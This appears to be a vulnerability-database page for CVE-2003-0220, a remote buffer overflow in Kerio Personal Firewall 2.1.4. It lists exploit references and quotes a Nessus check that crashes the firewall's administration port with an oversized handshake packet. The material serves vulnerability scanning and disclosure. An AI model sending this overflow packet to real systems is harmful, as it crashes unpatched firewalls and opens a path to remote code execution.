CVE-2003-0220 - Remote Authentication Packet Buffer Overflow vulnerability in Kerio Personal Firewall 2

047910
CVSS 7.5 - HIGH
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL

Tags: network, low complexity, kerio, nessus, exploit available, metasploit

Summary

Buffer overflow in the administrator authentication process for Kerio Personal Firewall (KPF) 2.1.4 and earlier allows remote attackers to execute arbitrary code via a handshake packet.

Exploit-Db

  • description: Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (2). CVE-2003-0220. Remote exploit for windows platform
    id: EDB-ID:22418
    last seen: 2016-02-02
    modified: 2003-04-30
    published: 2003-04-30
    reporter: ThreaT
    source: https://www.exploit-db.com/download/22418/
    title: Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability 2
  • description: Kerio Firewall 2.1.4 Authentication Packet Overflow. CVE-2003-0220. Remote exploit for windows platform
    id: EDB-ID:16465
    last seen: 2016-02-01
    modified: 2010-06-15
    published: 2010-06-15
    reporter: metasploit
    source: https://www.exploit-db.com/download/16465/
    title: Kerio Firewall 2.1.4 - Authentication Packet Overflow
  • description: Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (1). CVE-2003-0220. DoS exploit for windows platform
    id: EDB-ID:22417
    last seen: 2016-02-02
    modified: 2003-04-28
    published: 2003-04-28
    reporter: Core Security
    source: https://www.exploit-db.com/download/22417/
    title: Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability 1
  • description: Kerio Personal Firewall. CVE-2003-0220. Remote exploit for windows platform
    id: EDB-ID:1537
    last seen: 2016-01-31
    modified: 2006-02-28
    published: 2006-02-28
    reporter: y0
    source: https://www.exploit-db.com/download/1537/
    title: Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow
  • description: Kerio Personal Firewall 2.1.4 Remote Code Execution Exploit. CVE-2003-0220. Remote exploit for windows platform
    id: EDB-ID:28
    last seen: 2016-01-31
    modified: 2003-05-08
    published: 2003-05-08
    reporter: Burebista
    source: https://www.exploit-db.com/download/28/
    title: Kerio Personal Firewall 2.1.4 - Remote Code Execution Exploit

Metasploit

description: This module exploits a stack buffer overflow in the Kerio Personal Firewall administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4).
id: MSF:EXPLOIT/WINDOWS/FIREWALL/KERIO_AUTH
last seen: 2020-04-11
modified: 2017-07-24
published: 2006-09-13
references: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0220
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/firewall/kerio_auth.rb
title: Kerio Firewall 2.1.4 Authentication Packet Overflow

Nessus

NASL family: Firewalls
NASL id: KERIO_PF_BUFFER_OVERFLOW.NASL
description: Kerio Personal Firewall is vulnerable to a buffer overflow attack involving the administrator authentication process. An attacker may use this to crash Kerio or to execute arbitrary code on the system.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11575
published: 2003-05-06
reporter: This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11575
title: Kerio Personal Firewall Administrator Authentication Handshake Packet Remote Buffer Overflow
code:
#
# (C) Tenable Network Security, Inc.
#

# Exploit string by Core Security Technologies
#
# References:
# Date: Mon, 28 Apr 2003 15:34:27 -0300
# From: "CORE Security Technologies Advisories" <[email protected]>
# To: "Bugtraq" <[email protected]>, "Vulnwatch" <[email protected]>
# Subject: CORE-2003-0305-02: Vulnerabilities in Kerio Personal Firewall
#
# From: SecuriTeam <[email protected]>
# Subject: [EXPL] Vulnerabilities in Kerio Personal Firewall (Exploit)
# To: [email protected]
# Date: 18 May 2003 21:03:11 +0200
#
# Changes by rd : uncommented the recv() calls and tested it.
#

include("compat.inc");

if (description)
{
  script_id(11575);
  script_version("1.20");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_cve_id("CVE-2003-0220");
  script_bugtraq_id(7180);

  script_name(english:"Kerio Personal Firewall Administrator Authentication Handshake Packet Remote Buffer Overflow");
  script_summary(english:"Buffer overflow on KPF administration port");

  script_set_attribute(attribute:"synopsis", value:"The remote service is affected by a buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value:
"Kerio Personal Firewall is vulnerable to a buffer overflow attack
involving the administrator authentication process. An attacker may
use this to crash Kerio or to execute arbitrary code on the system.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Apr/358");
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Kerio Firewall 2.1.4 Authentication Packet Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/04/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/05/06");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:kerio:personal_firewall");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
  script_family(english:"Firewalls");

  #script_dependencie("find_service1.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/kerio", 44334);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = 44334;		# Default port
if (! get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(0);

b = recv(socket: soc, length: 10);
b = recv(socket: soc, length: 256);
expl = raw_string(0x00, 0x00, 0x14, 0x9C);
expl += crap(0x149c);
send(socket: soc, data: expl);
close(soc);

soc = open_sock_tcp(port);
if (! soc) security_hole(port);

Packetstorm

data source: https://packetstormsecurity.com/files/download/82995/kerio_auth.rb.txt
id: PACKETSTORM:82995
last seen: 2016-12-05
published: 2009-11-26
reporter: MC
source: https://packetstormsecurity.com/files/82995/Kerio-Firewall-2.1.4-Authentication-Packet-Overflow.html
title: Kerio Firewall 2.1.4 Authentication Packet Overflow